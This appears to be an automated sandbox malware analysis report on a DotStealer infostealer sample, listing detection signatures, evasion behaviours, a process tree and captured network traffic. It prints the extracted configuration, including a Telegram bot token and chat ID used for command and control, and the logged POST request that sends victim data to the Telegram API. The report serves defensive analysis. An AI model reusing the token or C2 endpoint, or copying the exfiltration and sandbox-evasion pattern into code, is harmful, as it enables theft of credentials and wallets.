
Windows Analysis Report
hvqc3lk7ly.exe

Overview

General Information

Sample name: hvqc3lk7ly.exe (renamed because the original name is a hash value)
Original sample name: 177a970a8a6c5e5e6b5c04c40bf3fe1c.exe
Analysis ID: 1574860
MD5: 177a970a8a6c5e5e6b5c04c40bf3fe1c
SHA1: 64709ca99a03f416a854817427d4543043e204ad
SHA256: 2a06b6535a0057b961f41e9b0790ffbc6f540566f2c21ae66cee4b61f5a360eb
Tags: exe, user-abuse_ch

Detection

Discord Token Stealer, DotStealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Discord Token Stealer
Yara detected DotStealer
Yara detected Telegram RAT
Yara detected Telegram Recon
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to capture screen (.Net source)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Self deletion via cmd or bat file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • hvqc3lk7ly.exe (PID: 6812 cmdline: "C:\Users\user\Desktop\hvqc3lk7ly.exe" MD5: 177A970A8A6C5E5E6B5C04C40BF3FE1C)
    • cmd.exe (PID: 7088 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp2A4E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp2A4E.tmp.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": "https://api.telegram.org/bot8137653339:AAG5i0WFhwI1I4U5IchQ2c9wOIxNBiamQsk/sendMessage"}
{"Telegram Token": "8137653339:AAG5i0WFhwI1I4U5IchQ2c9wOIxNBiamQsk", "Telegram Chatid": "6518356118", "StartDelay": "0", "RegistryKey": "GlobalIrisService", "BrAgressive": "true", "TgData": "true", "Metamask": "true", "Exodus": "true", "grabDesktop": "true", "MeltFile": "true", "PreventStartOnVirtualMachine": "true", "NoInstall": "true"}
Yara matches on the sample file:
Source: hvqc3lk7ly.exe, Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Author: Joe Security
Source: hvqc3lk7ly.exe, Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Author: Joe Security
Source: hvqc3lk7ly.exe, Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Author: Joe Security
Source: hvqc3lk7ly.exe, Rule: JoeSecurity_DotStealer, Description: Yara detected DotStealer, Author: Joe Security
Source: hvqc3lk7ly.exe, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security

Yara matches on memory dumps:
Source: 00000000.00000002.2458683778.00000215DBE8D000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_DotStealer, Description: Yara detected DotStealer, Author: Joe Security
Source: 00000000.00000002.2458683778.00000215DBDE1000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Author: Joe Security
Source: 00000000.00000002.2458683778.00000215DC0B9000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Author: Joe Security
Source: 00000000.00000000.2321958797.00000215D99D2000.00000002.00000001.01000000.00000003.sdmp, Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Author: Joe Security
Source: 00000000.00000000.2321958797.00000215D99D2000.00000002.00000001.01000000.00000003.sdmp, Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Author: Joe Security

Yara matches on unpacked PEs:
Source: 0.0.hvqc3lk7ly.exe.215d9b3d24c.1.raw.unpack, Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Author: Joe Security
Source: 0.0.hvqc3lk7ly.exe.215d9b3d24c.1.raw.unpack, Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Author: Joe Security
Source: 0.0.hvqc3lk7ly.exe.215d9b3d24c.1.raw.unpack, Rule: JoeSecurity_DotStealer, Description: Yara detected DotStealer, Author: Joe Security
Source: 0.0.hvqc3lk7ly.exe.215d9b3d24c.1.raw.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 0.0.hvqc3lk7ly.exe.215d9b3d24c.1.raw.unpack, Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Author: Joe Security

No Sigma rule has matched

Suricata IDS alerts:
Timestamp: 2024-12-13T17:48:25.482177+0100, SID: 2039009, Severity: 1, Classtype: A Network Trojan was detected, Source IP: 149.154.167.220, Source Port: 443, Destination IP: 192.168.2.12, Destination Port: 49715, Protocol: TCP
Timestamp: 2024-12-13T17:48:19.988848+0100, SID: 2803305, Severity: 3, Classtype: Unknown Traffic, Source IP: 192.168.2.12, Source Port: 49713, Destination IP: 208.95.112.1, Destination Port: 80, Protocol: TCP
Timestamp: 2024-12-13T17:48:24.562020+0100, SID: 2843856, Severity: 1, Classtype: A Network Trojan was detected, Source IP: 192.168.2.12, Source Port: 49715, Destination IP: 149.154.167.220, Destination Port: 443, Protocol: TCP


AV Detection

Source: hvqc3lk7ly.exe, Malware Configuration Extractor: Dot Stealer {"Telegram Token": "8137653339:AAG5i0WFhwI1I4U5IchQ2c9wOIxNBiamQsk", "Telegram Chatid": "6518356118", "StartDelay": "0", "RegistryKey": "GlobalIrisService", "BrAgressive": "true", "TgData": "true", "Metamask": "true", "Exodus": "true", "grabDesktop": "true", "MeltFile": "true", "PreventStartOnVirtualMachine": "true", "NoInstall": "true"}
Source: hvqc3lk7ly.exe.6812.0.memstrmin, Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8137653339:AAG5i0WFhwI1I4U5IchQ2c9wOIxNBiamQsk/sendMessage"}
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.6% probability
Source: hvqc3lk7ly.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\hvqc3lk7ly.exe, Code function: 0_2_00007FFE73450B50 GetCurrentProcessId,GetEnvironmentVariableA,lstrlenA,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,wsprintfA,GetEnvironmentVariableA,lstrlenA,lstrcatA,lstrcatA,lstrcmpA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,0_2_00007FFE73450B50
Source: C:\Users\user\Desktop\hvqc3lk7ly.exe, Code function: 0_2_00007FFE73419020 CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptEncrypt,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,CryptDestroyHash,0_2_00007FFE73419020
Source: C:\Users\user\Desktop\hvqc3lk7ly.exe, Code function: 0_2_00007FFE73418FE0 CryptReleaseContext,0_2_00007FFE73418FE0
Source: C:\Users\user\Desktop\hvqc3lk7ly.exe, Code function: 0_2_00007FFE73418DC0 CryptAcquireContextW,GetLastError,CryptReleaseContext,CryptReleaseContext,CryptReleaseContext,0_2_00007FFE73418DC0
Source: hvqc3lk7ly.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.12:49711 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49715 version: TLS 1.2
Source: hvqc3lk7ly.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\attat\source\repos\DotStealer-Builder (1.7) - NOT READY\DotStealer\DotStealer\obj\Release\net462\svchost.pdb source: hvqc3lk7ly.exe
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: hvqc3lk7ly.exe, 00000000.00000002.2472091914.00000215F47A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: hvqc3lk7ly.exe, 00000000.00000002.2472091914.00000215F47A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb source: hvqc3lk7ly.exe, 00000000.00000002.2471736410.00000215F4730000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: hvqc3lk7ly.exe, sqlite.interop.dll.0.dr
Source: Binary string: costura.costura.pdb.compressed source: hvqc3lk7ly.exe
Source: Binary string: BouncyCastle.Crypto.pdb source: hvqc3lk7ly.exe, 00000000.00000002.2461000846.00000215EBE4D000.00000004.00000800.00020000.00000000.sdmp, hvqc3lk7ly.exe, 00000000.00000002.2473588774.00000215F57A0000.00000004.08000000.00040000.00000000.sdmp, hvqc3lk7ly.exe, 00000000.00000002.2461000846.00000215EC84D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: hvqc3lk7ly.exe
Source: Binary string: BouncyCastle.Crypto.pdbSHA256 source: hvqc3lk7ly.exe, 00000000.00000002.2461000846.00000215EBE4D000.00000004.00000800.00020000.00000000.sdmp, hvqc3lk7ly.exe, 00000000.00000002.2473588774.00000215F57A0000.00000004.08000000.00040000.00000000.sdmp, hvqc3lk7ly.exe, 00000000.00000002.2461000846.00000215EC84D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: hvqc3lk7ly.exe
Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed5microsoft.win32.primitivesccostura.microsoft.win32.primitives.dll.compressed source: hvqc3lk7ly.exe
Source: C:\Users\user\Desktop\hvqc3lk7ly.exe, Code function: 0_2_00007FFE73411DB0 FindFirstFileExA,0_2_00007FFE73411DB0
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\AppData\Roaming\userUserCash\
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\AppData\Roaming\userUserCash\COOKIE~1
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe, File opened: C:\Users\user\

Networking

Source: Network traffic, Suricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.2.12:49715 -> 149.154.167.220:443
Source: Network traffic, Suricata IDS: 2039009 - Severity 1 - ET MALWARE Win32/SaintStealer CnC Response : 149.154.167.220:443 -> 192.168.2.12:49715
Source: unknown, DNS query: name: api.telegram.org
Source: global traffic, HTTP traffic detected: GET /attatier/Cloud/main/DotInfo.txt HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot8137653339:AAG5i0WFhwI1I4U5IchQ2c9wOIxNBiamQsk/sendDocument?chat_id=6518356118&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%208.46.123.189%0AUsername:%20user%0ALocation:%20United%20States%20[US],%20New%20York,%20New%20York HTTP/1.1 | Content-Type: multipart/form-data; boundary="001311e3-96ad-484e-83e7-c922d23536ab" | Host: api.telegram.org | Content-Length: 87825 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com
Source: global traffic, HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 149.154.167.220
Source: Joe Sandbox View, IP Address: 208.95.112.1
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: unknownDNS